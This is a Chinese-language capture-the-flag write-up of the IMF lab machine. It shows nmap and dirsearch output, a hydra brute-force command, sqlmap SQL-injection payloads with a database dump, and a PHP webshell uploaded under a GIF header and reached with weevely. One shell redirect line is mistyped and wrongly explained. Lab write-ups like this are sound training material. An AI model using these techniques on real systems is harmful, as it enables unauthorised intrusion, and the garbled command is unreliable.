imf
1.经典信息收集
nmap扫描1
2
3
4
5
6
7
8
9
10┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sP 192.168.159.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 19:08 CST
Nmap scan report for 192.168.159.2
Host is up (0.00078s latency).
Nmap scan report for 192.168.159.129
Host is up (0.000098s latency).
Nmap scan report for 192.168.159.139
Host is up (0.0011s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.85 seconds
看端口1
2
3
4
5
6
7
8
9
10
11
12
13┌──(kali㉿kali)-[~/桌面]
└─$ nmap -A -p- 192.168.159.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 19:11 CST
Nmap scan report for 192.168.159.139
Host is up (0.00065s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.05 seconds
扫后台1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u 192.168.159.139
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/桌面/reports/_192.168.159.139/_24-08-15_19-09-48.txt
Target: http://192.168.159.139/
[19:09:54] Starting:
[19:09:55] 301 - 315B - /js -> http://192.168.159.139/js/
[19:09:57] 403 - 301B - /.ht_wsr.txt
[19:09:57] 403 - 304B - /.htaccess.bak1
[19:09:57] 403 - 306B - /.htaccess.sample
[19:09:57] 403 - 303B - /.htaccessOLD2
[19:09:57] 403 - 302B - /.htaccess_sc
[19:09:57] 403 - 305B - /.htaccess_extra
[19:09:57] 403 - 302B - /.htaccessOLD
[19:09:57] 403 - 304B - /.htaccess_orig
[19:09:57] 403 - 304B - /.htaccess.orig
[19:09:57] 403 - 302B - /.htaccessBAK
[19:09:57] 403 - 304B - /.htaccess.save
[19:09:57] 403 - 295B - /.html
[19:09:57] 403 - 304B - /.htpasswd_test
[19:09:57] 403 - 294B - /.htm
[19:09:57] 403 - 301B - /.httr-oauth
[19:09:57] 403 - 300B - /.htpasswds
[19:09:58] 403 - 294B - /.php
[19:09:58] 403 - 295B - /.php3
[19:10:17] 200 - 2KB - /contact.php
[19:10:18] 301 - 316B - /css -> http://192.168.159.139/css/
[19:10:23] 301 - 318B - /fonts -> http://192.168.159.139/fonts/
[19:10:26] 301 - 319B - /images -> http://192.168.159.139/images/
[19:10:26] 403 - 297B - /images/
[19:10:28] 403 - 293B - /js/
[19:10:42] 200 - 2KB - /projects.php
[19:10:45] 403 - 304B - /server-status/
[19:10:45] 403 - 303B - /server-status
在里面的contact.php里面发现了第一个flag
flag里面一眼base64
没看懂,althefile啥意思
但是看着里面的js文件有一个是base64加密的
解码后是这个1
yYXRvcg==}
🤔,看着像是一部分
那我就讲上面两个也加进来
果然
falg2也出来了
1 | aW1mYWRtaW5pc3RyYXRvcg== |
在进行一次base
imfadministrator,看着应该是一个目录,进去以后发现是一个登录框,只有username和password
试了试跑sqlmap,用htdra跑,都没成,猜测过是不是contact.php下面的三个用户(那下面有三个人名)
但是都没成
尝试用PHP利用数组‘[ ]’绕过,试一试后台是否使用了不安全的函数进行对密码的验证
php中可以使用数组’[ ]‘绕过的函数有:1
2
3
4
5sha1
MD5
ereg
strpos
Strcmp
尝试爆破的时候rmichaels存在1
2hydra -l rmichaels -P /usr/share/wordlists/rockyou.txt 192.168.159.139 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:error"
flag3
仨东西看半天啥都没有,尝试了一下sql注入,这次有了报错
1 | sqlmap -u 'http://192.168.159.139/imfadministrator/cms.php?pagename=home' --cookie 'PHPSESSID=2n5274m8us95f0p8g59643oqt0' --dump |
回显1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66┌──(kali㉿kali)-[~]
└─$ sqlmap -u 'http://192.168.159.139/imfadministrator/cms.php?pagename=home' --cookie 'PHPSESSID=2n5274m8us95f0p8g59643oqt0' --dump
___
__H__
___ ___[.]_____ ___ ___ {1.8.7#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:49:03 /2024-08-15/
[19:49:03] [INFO] resuming back-end DBMS 'mysql'
[19:49:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pagename (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagename=home' AND 7798=7798 AND 'ySad'='ySad
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pagename=home' AND (SELECT 5733 FROM(SELECT COUNT(*),CONCAT(0x7176707871,(SELECT (ELT(5733=5733,1))),0x7162627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CdrD'='CdrD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagename=home' AND (SELECT 3343 FROM (SELECT(SLEEP(5)))Sctp) AND 'CJIN'='CJIN
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: pagename=-3960' UNION ALL SELECT CONCAT(0x7176707871,0x5266474a59766f466a63444e4758726f447a677748476d7146444d5850487153644e756173757052,0x7162627671)#
---
[19:49:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[19:49:03] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:49:03] [INFO] fetching current database
[19:49:03] [INFO] fetching tables for database: 'admin'
[19:49:03] [INFO] fetching columns for table 'pages' in database 'admin'
[19:49:03] [INFO] retrieved: 'id','int(11)'
[19:49:03] [INFO] retrieved: 'pagename','varchar(255)'
[19:49:03] [INFO] retrieved: 'pagedata','text'
[19:49:03] [INFO] fetching entries for table 'pages' in database 'admin'
[19:49:03] [INFO] retrieved: '1','Under Construction.','upload'
[19:49:03] [INFO] retrieved: '2','Welcome to the IMF Administration.','home'
[19:49:03] [INFO] retrieved: '3','Training classrooms available. <br /><img src="./images/w...
[19:49:03] [INFO] retrieved: '4','<h1>Disavowed List</h1><img src="./images/redacted.jpg"><...
Database: admin
Table: pages
[4 entries]
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| id | pagedata | pagename |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| 1 | Under Construction. | upload |
| 2 | Welcome to the IMF Administration. | home |
| 3 | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training. | tutorials-incomplete |
| 4 | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary | disavowlist |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
[19:49:03] [INFO] table '`admin`.pages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.159.139/dump/admin/pages.csv'
[19:49:03] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.159.139'
[*] ending @ 19:49:03 /2024-08-15/
访问之前没访问过的两个图片,其中的白板后面有一个二维码
flag4 get
老规矩,在base
(跟剥粽子一样,一层一层的
挺明显的传🐎
Linux里面有一个菜刀的下位weevely,试一试奥
坦白讲已经在质疑了,前面加上gif的头部
果然,惨遭拒绝,sad
好吧,我的问题,忘了吧c.php改成c.gif,这次上传成了
在源码中看到上传到服务器中的名字e4608a7887a0
weevely连接1
2
3
4
5
6
7
8
9
10
11
12┌──(kali㉿kali)-[~]
└─$ weevely http://192.168.159.139/imfadministrator/uploads/e4608a7887a0.gif test
[+] weevely 4.0.1
[+] Target: 192.168.159.139
[+] Session: /home/kali/.weevely/sessions/192.168.159.139/e4608a7887a0_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> id
这里报错后面连接错误,奇了怪了我留的是test的
这个不行我再试试别的,因为测试过只能穿图片类文件,那我就文件包裹被
1 | copy /b 文件1+文件2 文件3 |
还是不行,最后还是自己写的🐎,惆怅
1 | GIF89a |
这次成了
为啥不用蚁剑呢,这次又waf,就这么简单
这次终究是出来flag5了,点烟.jpg
后面wp说有一个缓冲区溢出,太晚了不想学了,tomorrow再说
补坑
奇了怪了,我用weevely又尝试了一边,也上传成功了,但是连接的时候说后门交流有问题,
自己写的🐎在上传的时候wget也出问题了,奇了怪了真的是
拿不到shell后面进行不下去,真是见了鬼了
解决了,有点绷不住了,kali.2024.1在不换源不更新的情况下能用weevely,但是一换源已更新或者下载的2024.2就不行了,一时间有点子难崩
这次终于是成功了
真的无语,我及时更新我还有错了属于是
这样的话也能抓到flag5了
继续剥洋葱
1 | find / -name agent &>1/dev/unll |
&>1/dev/unll:将错误输出到/dev/unll,只显示正确结果
找到这两个文件夹下面有agent文件
进入到bin里面看到两个文件
1 | www-data@imf:/var/www/html/imfadministrator/uploads $ cd /usr/local/bin/ |
提示了syn 7482 8279 9467
应该是端口号,nmap 扫一下
没扫出来,看了下wp应该先knock进行端口实验一下
很烦,这个kali一直下不了knockd,报错1
2
3
4正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
E: 无法定位软件包 knockd
给我整的有点无语
我用另一台弄的,knock了半天,nmap扫了半天,7788还是没开放
真是服了,折腾来折腾去的,不想打这个了,弃坑了
